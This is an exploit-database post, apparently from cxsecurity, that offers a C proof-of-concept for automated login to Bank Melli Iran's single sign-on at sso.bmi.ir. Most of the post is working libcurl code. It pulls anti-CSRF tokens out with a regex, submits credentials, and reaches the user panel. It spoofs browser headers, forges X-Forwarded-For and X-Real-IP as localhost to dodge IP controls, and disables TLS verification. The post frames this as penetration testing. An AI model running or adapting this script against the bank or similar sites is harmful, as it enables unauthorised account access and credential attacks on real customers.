C-Based Automated Login Analyzer with CSRF Token Extraction for SSO bmi.ir Systems

2025.07.11
ir E1.Coders (IR) ir
Risk: Low
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

This C-based proof-of-concept automates login to CSRF-protected SSO systems by mimicking browser headers, handling cookies, and extracting anti-forgery tokens using regex. It performs a full session simulation via libcurl, including GET, POST, and authentication state management. Intended for security research and penetration testing of SSO implementations. EXPLOIT : /* ******************************************************************************* CODE BY E1.CODERS 🎯 Target: bmi.ir – Bank Melli Iran Official Website website provides public access to banking news, services, customer support, online banking portals, and secure authentication systems such as SSO (Single Sign-On) for integrated access across BMI’s digital services. The domain hosts several subdomains and services, The SSO platform (sso.bmi.ir) uses anti-CSRF tokens, session cookies, and standard security headers. It also implements CAPTCHA and JavaScript-based challenges to prevent automated access. ******************************************************************************** */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <curl/curl.h> #include <regex.h> #define MAX_BUF 1000000 char response_buffer[MAX_BUF]; size_t response_offset = 0; size_t write_callback(void *contents, size_t size, size_t nmemb, void *userp) { size_t total = size * nmemb; if (response_offset + total < MAX_BUF) { memcpy(response_buffer + response_offset, contents, total); response_offset += total; response_buffer[response_offset] = '\0'; } return total; } char *extract_token(const char *html) { regex_t regex; regmatch_t matches[2]; const char *pattern = "__RequestVerificationToken\" type=\"hidden\" value=\"\\([^\"]*\\)\""; if (regcomp(&regex, pattern, REG_EXTENDED) != 0) return NULL; if (regexec(&regex, html, 2, matches, 0) != 0) { regfree(&regex); return NULL; } int start = matches[1].rm_so; int end = matches[1].rm_eo; int len = end - start; char *token = malloc(len + 1); strncpy(token, html + start, len); token[len] = '\0'; regfree(&regex); return token; } int main(void) { CURL *curl; CURLcode res; curl_global_init(CURL_GLOBAL_ALL); curl = curl_easy_init(); if (curl) { struct curl_slist *headers = NULL; curl_easy_setopt(curl, CURLOPT_URL, "https://sso.bmi.ir/"); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_callback); curl_easy_setopt(curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"); headers = curl_slist_append(headers, "X-Forwarded-For: 127.0.0.1"); headers = curl_slist_append(headers, "X-Real-IP: 127.0.0.1"); headers = curl_slist_append(headers, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); headers = curl_slist_append(headers, "Accept-Language: en-US,en;q=0.5"); headers = curl_slist_append(headers, "Connection: keep-alive"); headers = curl_slist_append(headers, "Referer: https://sso.bmi.ir/"); headers = curl_slist_append(headers, "Origin: https://sso.bmi.ir/"); headers = curl_slist_append(headers, "Host: sso.bmi.ir"); headers = curl_slist_append(headers, "Content-Type: application/x-www-form-urlencoded"); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers); curl_easy_setopt(curl, CURLOPT_COOKIEFILE, "cookies.txt"); curl_easy_setopt(curl, CURLOPT_COOKIEJAR, "cookies.txt"); curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); res = curl_easy_perform(curl); if (res != CURLE_OK) { fprintf(stderr, "%s\n", curl_easy_strerror(res)); curl_easy_cleanup(curl); curl_slist_free_all(headers); curl_global_cleanup(); return 1; } char *token = extract_token(response_buffer); if (!token) { fprintf(stderr, "Token not found\n"); curl_easy_cleanup(curl); curl_slist_free_all(headers); curl_global_cleanup(); return 1; } char postdata[1024]; snprintf(postdata, sizeof(postdata), "username=USERNAME&password=PASSWORD&__RequestVerificationToken=%s", token); free(token); curl_easy_setopt(curl, CURLOPT_URL, "https://sso.bmi.ir/account/login"); curl_easy_setopt(curl, CURLOPT_POST, 1L); curl_easy_setopt(curl, CURLOPT_POSTFIELDS, postdata); response_offset = 0; res = curl_easy_perform(curl); if (res != CURLE_OK) { fprintf(stderr, "%s\n", curl_easy_strerror(res)); curl_easy_cleanup(curl); curl_slist_free_all(headers); curl_global_cleanup(); return 1; } curl_easy_setopt(curl, CURLOPT_URL, "https://sso.bmi.ir/user/panel"); curl_easy_setopt(curl, CURLOPT_HTTPGET, 1L); response_offset = 0; res = curl_easy_perform(curl); if (res != CURLE_OK) { fprintf(stderr, "%s\n", curl_easy_strerror(res)); } curl_easy_cleanup(curl); curl_slist_free_all(headers); } curl_global_cleanup(); return 0; }


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2025, cxsecurity.com

 

Back to Top